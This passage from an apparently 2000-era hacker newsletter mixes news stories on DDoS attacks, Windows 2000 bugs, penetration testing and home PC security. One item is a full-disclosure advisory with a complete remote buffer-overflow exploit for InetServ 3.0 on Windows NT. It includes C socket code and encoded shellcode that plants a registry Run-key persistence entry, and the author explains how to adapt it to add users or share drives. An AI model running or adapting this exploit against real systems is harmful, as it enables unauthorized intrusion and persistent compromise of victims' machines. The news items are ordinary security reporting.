Ronald Dick, who heads computer investigations at the FBI, said it is highly likely that the attacks came from unwitting individuals or businesses whose computers have been compromised.
"Tools by which to launch these attacks have been placed there without their knowledge, and someone at a remote location is controlling those tools to launch attacks against the victims," Dick said. He said a popular place for cyber-criminals to plant such software was on third-party computers, many of them belonging to Internet service providers, or ISPs. Logs at the ISPs will be crucial to the investigation. FBI offers detection software Tools and defensive measures exist that can be used against hackers to minimize damage, Dick said. "Many of the distributed 'denial of service' tools currently are readily available out there on the Internet," he said. "You can download them, and it doesn't take any particular technical knowledge by which to utilize them." Dick said prevention, such as implementing security measures, is the key to stopping attacks on computer systems, whether in the private or public sectors. He said it is the responsibility of the entire cyber community because any lapse of computer security by one entity could cause harm to others. Dick said the FBI's National Infrastructure Protection Center (NIPC) has had multiple reports of computer intruders installing "distributed denial of service (DDOS) tools" on various computer systems. Those tools enable individuals to remotely launch cyber attacks. Those DDOS tools can be detected by software the NIPC is making available on its Web site at http://www.fbi.gov/nipc/trinoo.htm. Hackers could face 10-year sentences Investigators will be challenged in tracking down the originators of the attacks because many source addresses have been "spoofed" or falsified. However, Dick said they can ultimately be traced. "We're running every lead down until we find who did this," he said. Investisgators will use electronic surveillance to track back through ISPs and find who was at the keyboard, he said. Asked if there had been any credible claims of responsibility, Dick said, "None that I'm aware of." 
He said the attacks are a violation of federal statutes punishable by a minimum six-month prison sentence for first-time offenders and 10 years for repeat offenders. Criminal fines can range from $250,000 per count up to twice the gross loss of the victim.

'A 15-year-old could launch these attacks'

The cyber attacks began earlier in the week when Yahoo!, the Internet's most popular site, was jammed with messages beyond its vast capacity to handle them. On Tuesday, sites such as Amazon.com, Buy.com, and CNN.com were the victims of similar attacks. The attacks continued Wednesday with on-line broker E*Trade being partially blocked along with computer information site ZDNet.com.

Under the onslaught of messages, said Dick, the victim's Internet site simply shuts down until filters can be put in place that turn away the bogus messages.

Dick said a high level of technical sophistication is not necessary to launch such cyber attacks. "A 15-year-old kid could launch these attacks," he said.

But the search for those responsible likely will go global. "Historically, this is not just a U.S. issue. Inevitably we wind up overseas, where an unwitting ISP is utilized as a launch pad," Dick said.

@HWA

187.0 InetServ 3.0 - Windows NT - Remote Root Exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ADVISORY
--------

Greg Hoglund, Jan 2000
http://www.rootkit.com

- Reporting LIVE from RSA 2000 -

"The San Jose Convention Center... a contingent of trenchcoats mass in a dark corner laptops flipped to trade zer0-Day 'sploits..."

Target: InetServ 3.0 - Windows NT - Remote Root
Theme: Poorly Tested Software

I believe in full disclosure. A year ago I would have contacted the software vendor and informed them of a security problem, and waited a period of time before releasing the information. On or about Jan 1, 2000 I abandoned this philosophy. The number of unreleased, unpatched exploits related to buffer conditions is staggering. My deduction follows.
I, like many Hackers, have personally written software to test for and locate new buffer overflows in software. Occasionally for fun I will download a platter of the latest shareware and run it thru the Mill. As expected, I will find exploitable conditions. However, the sheer number of exploitable conditions surprises even myself.

After downloading a copy of InetServ 3.0 - a proxy server for Windows NT, I started testing a single remotely-addressable function of the software - a web service. In less than 1 minute...my automated testing software had already located a buffer overflow - a childlike and brainless overflow. It appeared that an http GET request with a 537 byte path would own EIP (in other words, allow me to control the remote processor).

This is not an isolated phenomenon. This advisory is not about that one buffer overflow. In fact, I will wager there are at least 10 discrete buffer overflow conditions in this software package alone, all of them exploitable from remote. There may be even more. The fact that I was able to find such a simple and easy to discover bug (the GET request - exploitable from a WEB Browser URL!) only substantiates that this piece of software was never adequately tested in QA.

I wondered to myself - should I report this to the software vendor? They may need time to release a patch. It then occurred to me that I would only find another buffer condition after they had released the patch - and once again I would assume the burden of informing them. In effect I realized that what I needed to tell them was that their QA process either sucked, or was non-existent. By telling them about specific buffer overflows I am actually performing QA for them - and they do not pay me to do that. That is not my responsibility.

(the epiphany occurs here)

It is not the responsibility of myself, or any hacker for that matter, to perform QA for a software vendor.
It is only the responsibility of the hacker to expose software which has clearly never been engineered properly. (need I bring up Seattle Labs Sendmail? - a target of embarrassing levels of exploit over the past few years - why bother?)

If you are responsible for deploying a large project, or you are investing your company into a software solution - I have a single piece of advice:

HAVE THE SOFTWARE INDEPENDENTLY TESTED BY A QUALIFIED SOFTWARE LAB!

The cost of doing this is far less than the cost of ownership if you invest in poorly engineered software! There are several commercial testing labs that employ some great talent. Software Quality is generally so bad that I don't think insurance companies should touch your enterprise with a 10 foot pole until a software lab has determined low risk.

(I step down from the podium)

Let's talk about this exploit:

The fact that the GET request causes an overflow is far from noteworthy. I can tell just by the disassembly that there are many more overflows where this came from. (I actually tested several programs today, and all but one had remote buffer overflow bugs - I leave the others for future cannon fodder). What is worth talking about is the payload I designed for this exploit. So, the rest of the discussion is about the payload.

One of the most common things a payload does is open a remote shell. A number of months back I wrote a small intrusion prevention tool that rendered all of these overflows harmless - an NT kernel patch that prevents my server software from launching sub-processes. Gee, all of the 'shell' based overflow attacks have been demoted to ankle-biters. Of course, those of you with experience immediately realize that a payload can do anything it wants - and as the virus underground has taught us - there are a million ways to torture a computer.
Today's payload does not open a remote shell - rather, it shares all of your hard drives without a password - and does this without launching a single sub-process or even loading any new functions. We are going to attack the NT registry through functions already loaded into the process space.

Most processes have useful functions already loaded into address space. Using WDASM and VC++ I was able to find the memory location of the following functions:

Name:                       Jump Table:   Actual (NTServer 4.0 SP3)
ADVAPI32.RegCloseKey        [43D004]      77DB75A9
ADVAPI32.RegCreateKeyExA    [43D008]      77DBA7F9
ADVAPI32.RegOpenKeyExA      [43D00C]      77DB851A
ADVAPI32.RegQueryValueExA   [43D010]      77DB8E19
ADVAPI32.RegSetValueExA     [43D000]      77DBA979

Since we cannot be assured where the location of ADVAPI32.DLL will be mapped, we simply use the jump table itself, which will be loaded in the same location regardless.

In order to prevent NULL characters, I XOR my data area with 0x80. The payload first decodes the data area, then calls the following functions in order to add a value to the windows RUN key:

RegOpenKeyEx();
RegSetValueEx();

In order to avoid NULLs I used an XOR between registers, as you see in the code:

    mov eax, 77787748
    mov edx, 77777777
    xor eax, edx
    push eax

followed later only by:

    mov eax, 0x77659BAe
    xor eax, edx
    push eax

These values translate to addresses in the local area which require a NULL character, hence the XOR.

The value in the example is merely "cmd.exe /c" with no parameters. You could easily alter this to add a user to the system, or share a drive. For "script kiddie" purposes you will get nothing here - you'll need to alter the cmd.exe string and alter the size variable in the decode loop (shown here set to 0x46):

    xor ecx, ecx
    mov ecx, 0x46
LOOP_TOP:
    dec eax
    xor [eax], 0x80
    dec ecx
    jnz LOOP_TOP (75 F9)

Once this runs, check your registry and you'll find the value in question. The value will be executed upon the next reboot. This is a very common way for network worms to operate, incidentally.
The only snag when using an HTTP request is that there are some
characters that are filtered or special - so you must avoid these. This
limits which machine instructions you can directly inject - however
there are always ways to get around such problems. In conclusion, I am
merely trying to demonstrate that there are many things a buffer
overflow can do besides create a shell or download a file - and many
forms of host based IDS will not notice this. Now clearly the Run key is
a common place for security-savvy people to look, but it could have
easily been something else more esoteric.

CODE FOLLOWS:

// Build as a C++ source file (the original was VC++ and uses try/catch).
// winsock2.h goes before windows.h when asking for Winsock 2.0.
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib, "ws2_32.lib")

#define TARGET_PORT 224
#define TARGET_IP   "127.0.0.1"

// Adjacent string literals concatenate, so no line continuations are
// needed between the pieces; the comments sit on their own lines.
char aSendBuffer[] =
"GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAABBBBAAAACCCCAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAADDDDAAAAEEEEAAAAAAAAAAA"
// mov eax, 0x12ED1FFF    (the bytes encode 1FFF; earlier notes said 21FF)
// sub al, 0xFF           eax = 0x12ED1F00
// rol eax, 0x18          eax = 0x0012ED1F, one past the end of the data area
// mov ebx, eax           (built this way so the NULL byte never appears in code)
"\xB8\xFF\x1F\xED\x12\x2C\xFF\xC1\xC0\x18\x8B\xD8"
// xor ecx, ecx
// mov cl, 0x46           decode length; B1 46 is the 8-bit form, the 32-bit
//                        "mov ecx, 0x46" (B9 46 00 00 00) would carry NULLs
// LOOP_TOP:
// dec eax
// xor byte [eax], 0x80
// dec ecx
// jnz LOOP_TOP           (75 F9)
"\x33\xC9\xB1\x46\x48\x80\x30\x80\x49\x75\xF9"
// push ebx               phkResult: the hKey is written just past the data
"\x53"
// mov eax, 0x77787748
// mov edx, 0x77777777
// xor eax, edx           eax = 0x000F003F (KEY_ALL_ACCESS)
// push eax               samDesired
"\xB8\x48\x77\x78\x77"
"\xBA\x77\x77\x77\x77"
"\x33\xC2\x50"
// xor eax, eax
// push eax               ulOptions = 0
"\x33\xC0\x50"
// mov eax, 0x77659BAE
// xor eax, edx           eax = 0x0012ECD9 (decoded key path on the stack)
// push eax               lpSubKey
"\xB8\xAE\x9B\x65\x77\x33\xC2\x50"
// mov eax, 0xF7777775
// xor eax, edx           eax = 0x80000002 (HKEY_LOCAL_MACHINE)
// push eax               hKey
"\xB8\x75\x77\x77\xF7"
"\x33\xC2\x50"
// mov eax, 0x7734A77B
// xor eax, edx           eax = 0x0043D00C, the RegOpenKeyExA jump table slot
// call [eax]             RegOpenKeyExA(HKLM, path, 0, KEY_ALL_ACCESS, &hKey)
"\xB8\x7B\xA7\x34\x77"
"\x33\xC2"
"\xFF\x10"
// mov edi, ebx           edi -> hKey written by RegOpenKeyExA
// mov edx, 0x77777777
// mov eax, 0x77659A63
// xor eax, edx           eax = 0x0012ED14 (the command string)
// sub ebx, eax           ebx = length of the command string, NULL included
// push ebx               cbData
// push eax               lpData
// push 1                 dwType = REG_SZ
// xor ecx, ecx
// push ecx               Reserved = 0
// mov eax, 0x77659A70
// xor eax, edx           eax = 0x0012ED07 (the value name)
// push eax               lpValueName
// push [edi]             hKey
// mov eax, 0x7734A777
// xor eax, edx           eax = 0x0043D000, the RegSetValueExA jump table slot
// call [eax]             RegSetValueExA(hKey, name, 0, REG_SZ, cmd, cbData)
"\x8B\xFB"
"\xBA\x77\x77\x77\x77"
"\xB8\x63\x9A\x65\x77\x33\xC2"
"\x2B\xD8\x53\x50"
"\x6A\x01\x33\xC9\x51"
"\xB8\x70\x9A\x65\x77"
"\x33\xC2\x50"
"\xFF\x37\xB8\x77\xA7\x34"
"\x77\x33\xC2\xFF\x10"
// int 3                  halt here, or jump to somewhere harmless
"\xCC"
"AAAAAAAAAAAAAAA"
// nop ; nop              (int 3 while debugging)
// jmp short -0x80        (EB 80: back to the start of the payload)
// followed by the dword 0x77F9D9EB, little-endian
"\x90\x90\xEB\x80\xEB\xD9\xF9\x77"
/* registry key path "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
   XORed with 0x80; the 0x80 bytes decode to the NULL terminators */
"\xDC\xD3\xCF\xC6\xD4\xD7\xC1\xD2\xC5\xDC\xCD\xE9\xE3\xF2"
"\xEF\xF3\xEF\xE6\xF4\xDC\xD7\xE9\xEE\xE4\xEF\xF7\xF3\xDC\xC3"
"\xF5\xF2\xF2\xE5\xEE\xF4\xD6\xE5\xF2\xF3\xE9\xEF\xEE\xDC"
"\xD2\xF5\xEE\x80"
/* value name "_UR_HAXORED_" */
"\xDF\xD5\xD2\xDF\xC8\xC1\xD8\xCF\xD2\xC5\xC4\xDF\x80"
/* the command "cmd.exe /c" */
"\xE3\xED\xE4\xAE\xE5\xF8\xE5\xA0\xAF\xE3\x80\x80\x80\x80\x80";

// usage: prog [host [port]]
int main(int argc, char* argv[])
{
    WSADATA     wsaData;
    SOCKET      s;
    SOCKADDR_IN addr;

    addr.sin_family = AF_INET;
    if (3 == argc) {
        int port = atoi(argv[2]);
        addr.sin_port = htons(port);
    } else {
        addr.sin_port = htons(TARGET_PORT);
    }
    if (2 <= argc) {
        // host is argv[1]; the original read argv[2], which is the port
        addr.sin_addr.S_un.S_addr = inet_addr(argv[1]);
    } else {
        addr.sin_addr.S_un.S_addr = inet_addr(TARGET_IP);
    }

    try {
        WSAStartup(MAKEWORD(2,0), &wsaData);
        s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if (INVALID_SOCKET == s)
            throw WSAGetLastError();
        if (SOCKET_ERROR == connect(s, (SOCKADDR *)&addr, sizeof(SOCKADDR)))
            throw WSAGetLastError();
        // strlen() stops at the first NULL, which is why neither the code
        // nor the data area may contain one
        send(s, aSendBuffer, strlen(aSendBuffer), 0);
        closesocket(s);
        WSACleanup();
    } catch (int err) {
        fprintf(stderr, "error %d\n", err);
    }
    return 0;
}

ps. This took all day, I need a scotch...
Special Thanks: Barnaby Jack, DilDog, Jeremy Kothe - your skills are Elite, thanks for publishing. @HWA 188.0 Bugfest! Win2000 has 63,000 'defects' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by _ImDeaD_ http://www.zdnet.com/zdnn/stories/news/0,4586,2436920,00.html?chkpt=zdnntop Bugfest! Win2000 has 63,000 'defects' Urging developers to clean up their code, a Microsoft exec says: 'How many of you would spend $500 on a piece of software with over 63,000 potential known defects?' It ships Thursday. By Mary Jo Foley, Sm@rt Reseller UPDATED February 11, 2000 2:25 PM PT Not everyone will be having fun at Microsoft Corp. next week. While the software giant and its partners celebrate the arrival of Windows 2000 on Thursday, Feb. 17, hundreds of members of the Windows development team will be busy cleaning up the mess. Not the launch-party mess. The code mess. According to an internal Microsoft (Nasdaq: MSFT) memo viewed by Sm@rt Reseller, the company needs to fix tens of thousands of bugs contained in the final Win2000 release code. Fixing these bugs is the top-priority assignment for Microsoft group VP Jim Allchin's Windows team. "Our customers do not want us to sell them products with over 63,000 potential known defects. They want these defects corrected," stated one of Microsoft's Windows development leaders, Marc Lucovsky, in the memo. "How many of you would spend $500 on a piece of software with over 63,000 potential known defects?" According to the Microsoft memo, the Windows 2000 source-code base contains: More than 21,000 "postponed" bugs, an indeterminate number of which Microsoft is characterizing as "real problems." Others are requests for new functionality, and others reflect "plain confusion as to how something is supposed to work." More than 27,000 "BugBug" comments. These are usually notes to developers to make something work better or more efficiently. According to Microsoft, they tend to represent "unfinished work" or "long-forgotten problems." 
Overall, there are more than 65,000 "potential issues" that could emerge as problems, as discovered by Microsoft's Prefix tool. Microsoft is estimating that 28,000 of these are likely to be "real" problems. "Our goal for the next release of Windows 2000 is to have zero bugs. The only way this happens is if you take it upon yourselves to fix the bugs that should be fixed, and close the bugs that should be closed," continued Lucovsky in his note to the development team. He added that no new code for future Windows releases, such as Whistler and Blackcomb, will be allowed to be "checked in" until the development team has fixed the existing Windows 2000 bugs. Microsoft's response A spokeswoman for Microsoft strongly defended Windows 2000's quality. "Bugs are inherent in computer science," she said. "All software ships with issues. The difference is (that) no software in the history of Microsoft development has ever been through the incredible, rigorous internal and external testing that Windows 2000 has been through." The spokeswoman said 750,000 testers received each beta version of Windows 2000. She said "hundreds of companies have signed off on the incredibly high quality and reliability of Windows 2000." The result, she said, is that hundreds of companies are deploying Windows 2000 before general availability. One developer, informed of Microsoft's bug estimates, said all new software ships with lots of bugs but few software vendors are willing to acknowledge this reality. "The fact that Microsoft found that many bugs indicates to me just how thorough their testing processes are," said the Windows developer, who requested anonymity. Waiting for bug fixes But others aren't so sure. Market researchers have repeated warnings to their clients against upgrading immediately to Win2000. Several outfits have advised customers to wait until Microsoft issues its first or second service pack before deploying Win2000. 
And research outfits made these suggestions before the exact bug tallies came to light. Despite these bugs, Microsoft has made Windows 2000's reliability a key focus and part of its marketing message for months. At Comdex/Fall last year, Allchin detailed the two-year-old reliability initiative upon which Microsoft had embarked to insure Win2000 would be more stable and reliable than NT 4.0 or its predecessors. Allchin said Microsoft spent 500 person-years and $162 million on people and tools specifically to improve reliability of the product. In more recent weeks Microsoft has plastered ads on buses, billboards and telephone booths in a number of major cities. "Windows 2000 is coming. Online or off, a standard in reliability," reads the text. Other hurdles Windows 2000 is hardly Microsoft's only worry in the coming months. Another big hurdle is application support for the OS. Microsoft has been working on a slew of Windows 2000/Active Directory-optimized applications that ultimately will ship as some type of BackOffice 2000 or BackOffice 5.0 package. The first BackOffice 2000 beta isn't expected until some time in the second half of this year, but the first BackOffice 2000 app upgrade, Exchange 2000, is expected to arrive at midyear. Other BackOffice Server updates -- the next releases of SQL Server, Proxy Server, SNA Server and Systems Management Server -- also are in the development pipeline. But exactly how far along they are is unclear. At the same time, Microsoft is developing several BackOffice add-ons. Microsoft preannounced some of these add-ons, such as its BizTalk Server, Commerce Server and AppCenter Server, a full year ago. But first betas of these point products have yet to appear. The company doesn't plan to move any of these new point products into the BackOffice SKU, said Russ Stockdale, director of server applications marketing with Microsoft's Business Productivity Group. 
Stockdale said Microsoft's plan is to continue to offer current and future BackOffice SKUs to branch-office customers and midsized organizations. Stockdale acknowledged that BackOffice 2000 will have little appeal to e-commerce and dotcom customers -- even though Microsoft is pitching its anchor, Windows 2000, as an e-commerce-optimized operating system. @HWA 189.0 Legit Hackers Roam Cyberspace for Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by Slash So you thought hackers were nerds in dark rooms travelling in cyberspace to attack companies' computer systems or steal data. Full Story <http://www.ukhackers.com/0602001.htm> Legit Hackers Roam Cyberspace for Security So you thought hackers were nerds in dark rooms travelling in cyberspace to attack companies' computer systems or steal data. Think again. A new breed of hackers licensed to hack legally into companies around the world, ranging from banks in Israel and Britain to e-commerce companies in Spain, and check their systems' security, is at work in Sweden. The Stockholm-based private company Defcom, set up in April last year, is a pioneer in a shadowy business that may seem more like a scene from one of legendary American science fiction author William Gibson's novels than reality. But Defcom (www.defcom-sec.com) actually gets paid for hiring out its ``ethical hackers'' to large companies, mostly in the banking, insurance and e-commerce sector around Europe. ``Nine out of 10 companies we're employed to check, we can break into through the Internet,'' Defcom chief executive Thomas Gullberg told Reuters. ``That's a frightening statistic.'' Defcom expects its business to grow fast as more companies seek protection from hackers, sophisticated users of advanced computer programming languages who can break into computer systems or Web sites to change or steal information. 
Consumers handed an estimated $30 billion over to Internet sites last year, a sign that a lot of people have lost their fears about shopping online. Most got what they ordered and didn't have their credit card details abused. Online Boom Threatens Security But the Web is becoming an ever more attractive playground for hackers as e-commerce mushrooms in Europe and the United States, and sensitive data is transferred over the Internet. Security experts say some Web sites are forgetting about security issues in their rush to be on the Internet. One concern is the expected arrival of mobile phones linked to the Web, creating more opportunities for hackers to get in. And some worry that putting too many security features on a site scares away some consumers and slows the transaction process, while costly security features cannot match the returns of investments in marketing and customer acquisition. A survey by Zona Research showed that consumers who have to wait more than eight seconds will click to another site. Hackers can break into practically any computer system if they want to, Defcom said. Defcom is one of hundreds of Net start-ups in Sweden, one of the world's most wired countries. With its high Internet penetration and wide use of e-commerce and Internet banking, Sweden also has some of the world's best online security. ``We aim to be the leader in Europe. I think we are already,'' Gullberg said. ``It's such a new area. We're the only ones who've managed to organize it properly. Some have tried but failed.'' Licensed To Hack It was hard at first to bring hackers together, but Gullberg was surprised by the willingness on the part of hackers to turn legitimate. ``We've brought hacking to another stage, made it ethical,'' Gullberg said. ``We've gathered hackers under one roof. 
After all they're the best in the business, they know how it's done.'' Defcom's motto, displayed in one of the main hackers' rooms, sums it up: ``It takes one to know one.'' The Swedish company -- with an office in London -- has grown to over 40 staff, of whom about half are professional hackers, aged 23 to 30. One has a criminal record. To boost expertise and knowledge it has also hired a police officer from the IT security division in Sweden's national crimes prevention unit. Once appointed by a company to check their security system staff carry out a technical analysis then travel to the country of the company and start hacking. What makes them different to some other data security firms is that they actually make changes in their customers' computers to see whether they can really be hacked into, Defcom said. ``We don't just go to the firewall and prove that we can break it, but we go into the main computers,'' Defcom's senior cyberspace hacker, who asked to remain anonymous, told Reuters. The company prefers not to name its hackers as this may unleash a backlash from real hackers out there seeking to disturb the legitimate ones. Defcom takes between two hours to three days with most cases fixed once it tells them how to improve the system. ``We deliver the truth to clients. The bitter-sweet truth,'' Gullberg said.

Most Business In Finance Sector

``Security has been a big problem in the business world and it still is. The Internet is not safe,'' Gullberg said. Defcom says it is not hard to convince companies of their market expertise, although clients' IT officials get very nervous once they manage to hack into their systems. Most illegal hacking in finance centers on stealing credit card numbers but is expanding quickly into industrial espionage.
Defcom said an underground market known as ``information broker'' sites was growing on the Web where clients could scout around for hackers to do their dirty work, like breaking into a company to steal car designs or corporate data. Defcom has several contracts in Israel, especially in Internet banking, and said that despite its reputation as one of the world's high-tech nations its security was often sloppy. It also has contracts in Europe but has not yet moved into the United States, the biggest market for hackers. Defcom, which eventually plans to go public, has some 50 fixed customers -- including Sweden's top listed companies -- who sign three-year contracts for monthly visits from Defcom. ``We work for insurance companies in Britain who want their clients, especially banks, checked to see how safe they are and what insurance premium they should have,'' Gullberg said. The security industry got a boost last month in the form of the Clinton administration's plan to relax rules on the export of sophisticated encryption technology, which enables people to conceal credit card numbers and other data from prying eyes. The need for tighter security was underscored last month when hackers broke into online music retailer CD Universe, a unit of EUniverse Inc. and stole 300,000 credit card numbers, demanding payment of $100,000 not to use them. Defcom advises its clients not to publicize their use of its services as this could be a challenge to the hacking community. ``It's easy to break into the system. Too easy. But often customers don't know when the companies have had intruders because they cover it up,'' the top hacker said. 
@HWA

190.0 Deutch controversy raises security questions for Internet users
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by Slash

'A huge vulnerability'

Full Story <http://www.ukhackers.com/0602002.htm>

Deutch controversy raises security questions for Internet users

From Science Correspondent Ann Kellan

Former CIA Director John Deutch's alleged use of a home computer to store classified materials has sparked a security scare in the U.S. intelligence community and has also pointed out a problem many Internet users are not aware of. The minute anyone logs onto the Internet, financial records and other personal information stored on a home computer are an open book to any cyber-thief. Security experts say Deutch would be a much bigger target than the average person. "There are known foreign intelligence agents operating on the Internet today ... and they are actively seeking U.S. intelligence on the Internet," said Daniel Verton of Federal Computer Week. "It's hard to know exactly what he had on his home computer," Verton said. "But we do know that it was thousands of pages in length, we do know it was top secret and probably ranged the entire breadth of classifications, from unclassified to top secret code word information." Most hackers are more interested in larceny than espionage, targeting credit card numbers and bank records. Those records are becoming more vulnerable as the number of people using the Internet grows.

'A huge vulnerability'

The modems that most home computers use to connect to the Internet are difficult, but not impossible, for a thief to crack. But some new ways to log on are less secure. "We're seeing things like broadband Internet ... faster connections that are always on," said PC World Magazine's Sean Dugan. "That's a huge vulnerability." Computers connected to the Internet through high-speed cable modems are at the highest risk, because they share the line with other people.
Danger lurks in 'Trojan Horses' Microsoft Windows even has a setting that lets users share information with those people. This function can be disabled if you don't want others to have access to your computer. Another point of entry is through e-mail attachments, where so-called "Trojan horses" can be hidden. These programs give thieves the ability to control another computer from a remote location, without the user's knowledge. Security software and programs that scramble or encrypt data are available, but experts say the best way for users to protect themselves is to keep private information off-line. @HWA 191.0 PC's Vulnerable to Security Breaches, Experts Say ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by Slash Unless a home PC is placed in an isolation tank, computer security experts say, it is vulnerable to a panoply of potential intrusions. full Story <http://www.ukhackers.com/0602003.htm> PC's Vulnerable to Security Breaches, Experts Say Unless a home PC is placed in an isolation tank, computer security experts say, it is vulnerable to a panoply of potential intrusions. For that reason, it can be an extremely hazardous place to keep anything remotely confidential, much less the classified documents that John M. Deutch, the former director of central intelligence, had stored on his unsecured home computers in 1996. "The more software people have on their computers, and the more they are online, the more vulnerable they become to attack," said Avi Rubin, an Internet security expert at AT&T Labs Research in Florham Park, N.J. "All the factors that contribute to increased vulnerability are becoming more and more common." To be sure, general awareness of security vulnerabilities among home PC users was not very high in 1996, when people were beginning to explore the World Wide Web in increasing numbers. Then, as now, the level of vulnerability depended largely on how the computer was used and on what precautions were taken. 
A computer user's vulnerability to attack does not depend as much on which Web site is visited as on what software is used to gain access to the Internet, experts say. Mr. Deutch's computers had access to the Web via America Online. And, in 1996, America Online accounts were among the most frequent targets of attackers, who used sundry ploys to gain access to members' passwords. This included planting malicious hidden programs known as trojan horses on the victims' hard drives. In recent years, experts have exposed a number of security holes in browsing software. In general, however, e-mail programs are the software most vulnerable to intrusion, said Richard Smith, an Internet security consultant in Cambridge, Mass. That is because a trojan horse attack can come in the form of a malicious program attached to a piece of e-mail or, in some instances, can be carried within the e-mail message itself. In either case, these programs end up on a computer's hard drive, where they can do many kinds of mischief. For example, some have been known to capture passwords by monitoring the victim's keystrokes. This has been a common attack on AOL. "It's possible that you can read files off a hard drive and then send them back on the Web as e-mail to someone else, or post them to a news group," Mr. Smith said. The danger of a trojan horse is that it is a seemingly legitimate program that hides -- and eventually executes -- a malicious code. While many such attacks are mounted randomly, Mr. Smith said that such a method of gaining access to a computer would be ideal for espionage. "These security holes would be a great way for spying," he said. This could be accomplished, he said, by sending an e-mail message containing a clandestine program that lowers the computer's security settings, paving the way for a second, more malicious program. 
"If you're in the spy business," he said, "what better way to do it than to get the home e-mail addresses of important people and use some of these security holes to bug their computer?" Mr. Smith said he knew of no such incidents involving espionage, but he added that a portion of a fast-spreading virus called Melissa, which infected thousands of computers last year, worked by lowering the security settings on target computers. Mr. Smith said it was only relatively recently that security holes in Internet-based software were systematically documented. Whether Mr. Deutch had anti-virus software installed on his computers has not been made public. Even if he did, Mr. Rubin said, anti-virus software offers protection only against known viruses. "The big problem is a virus that's creative and new and acts in a way unanticipated by the anti-virus writers," he said. "There's no way to defend against a virus like that." Investigators have not revealed the kind of lines with which Mr. Deutch's computers had been connected to the Internet, but it is likely that they had used a dial-up modem. A dial-up connection poses less of a security risk than what is known as a persistent connection -- like a cable modem or digital subscriber line, or DSL -- in which a computer is always online. Persistent connections typically are much higher speed than dial-up connections and have surged in popularity only recently. Mark Seiden, chief network security consultant to the Kroll-O'Gara Information Security Group in Palo Alto, Calif., said a more interesting question was the extent to which Mr. Deutch was sending and receiving sensitive information from the home computer via e-mail. E-mail traveling over the Internet is vulnerable to interception. Unless it is encrypted, its contents are there for the taking. "The last time I talked to someone at the C.I.A. about sending something there, they said to send it by U.S. mail," Mr. Seiden said. "They didn't want me to e-mail them anything." 
The fact that no computer is an island these days, Mr. Rubin said, has put security experts in something of an "arms race" with potential intruders. "They take a few steps forward, then we take a few steps," he said. In spite of a tremendous effort on the part of security professionals to secure computers, Mr. Rubin said, "I'd say the attackers have the edge."

@HWA

192.0 Hacking hazards come with Web scripting territory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by Slash

Heard about a Web security issue lately? Chances are scripting was part of the problem.

Full Story <http://www.ukhackers.com/0602004.htm>

Hacking hazards come with Web scripting territory

Heard about a Web security issue lately? Chances are scripting was part of the problem. If you've surfed the Web recently, you've almost certainly seen scripts at work performing some of the most common tasks of today's Web pages, from helping users search pages to scrolling text across the screen and launching new windows. In the wake of a government advisory about a newly recognized Web scripting security threat, software providers fear scripting is getting a bum rap despite security protections built into the top scripting implementations. Web scripting is the method most sites use to create moving parts.
Scripting languages such as JavaScript--invented in 1995 by Brendan Eich at Netscape, now a division of America Online--bring to the Web the kind of features that at the dawn of the Web could be found only on the computer desktop, features that let users interact with sites without calling up a new page from the server. The difference between scripting languages, which can be found on and off the Web, and computer programming languages like C++ or Fortran, is that scripting languages are interpreted, while programming languages are compiled. Compilers translate programming instructions written by humans into a language a microchip can understand. With scripts, browsers essentially do that work on the fly. Scripts are powerful enough, however, to do real damage when written maliciously. Both this week's government advisory and countless other exploits demonstrated by bug hunters on the Web have shown how hackers can take advantage of the flexibility and power of scripting to pry into Web surfers' private information, both in the browser and in other applications on the computer. Chief among these bug hunters is the Bulgarian security consultant Georgi Guninski, who has numerous scripting exploits to his name for the major browsers provided by Microsoft and Netscape. In a recent example, Guninski showed how Microsoft's Outlook Express mail reading application let a malicious user embed a script within a message to expose the mail of the targeted user while the initial message window remained open. Guninski earned a steady income of $1,000 per bug from Netscape before the company brought him on board as a consultant last summer. Security experts point out, however, that the government's advisory did not pinpoint any flaw on the scripting side of things, but rather with Web sites' implementation of forms that permitted the introduction of potentially malicious scripting tags. 
Despite the frequency of scripting-related security problems, Microsoft stresses that the hazards come with the technology territory. "There is always a balance between security and ease of use, and scripting is no exception," a Microsoft spokeswoman said. "It is up to each customer to decide what sites they want to allow to perform scripting and which they don't." She noted that Internet Explorer's security zones let users classify sites according to whether they are known and trusted and therefore allowed to run scripts. Netscape said that scripting is the safer of various alternatives because of its "sandbox" security model, which only allows the script to interact within certain boundaries on the site visitor's computer. Michael La Guardia, group product manager for the Communicator browser, explained that JavaScript is only allowed to interact with the user through the Web interface. "If you have native code talking directly to your computer, it could do anything," he said. "It could set up a listener and get sensitive information like passwords and credit card numbers or erase your hard drive. With JavaScript, the programmer is not allowed to execute native code." He added: "If it were native code running all the time, we wouldn't have the Web as we have it today. It would be one giant gaping security hole." For example, Microsoft's ActiveX technology has been criticized for running code on computers while relying on a "trust" security model, in which ActiveX controls can execute native code provided the user has decided they trust the control's source. Even with sandbox protections, however, Netscape said users should exercise caution in choosing which sites to visit. "The best thing people can do in the face of this is not to talk to strangers," La Guardia said. "Don't go into dark alleys. There are bad places out there--and 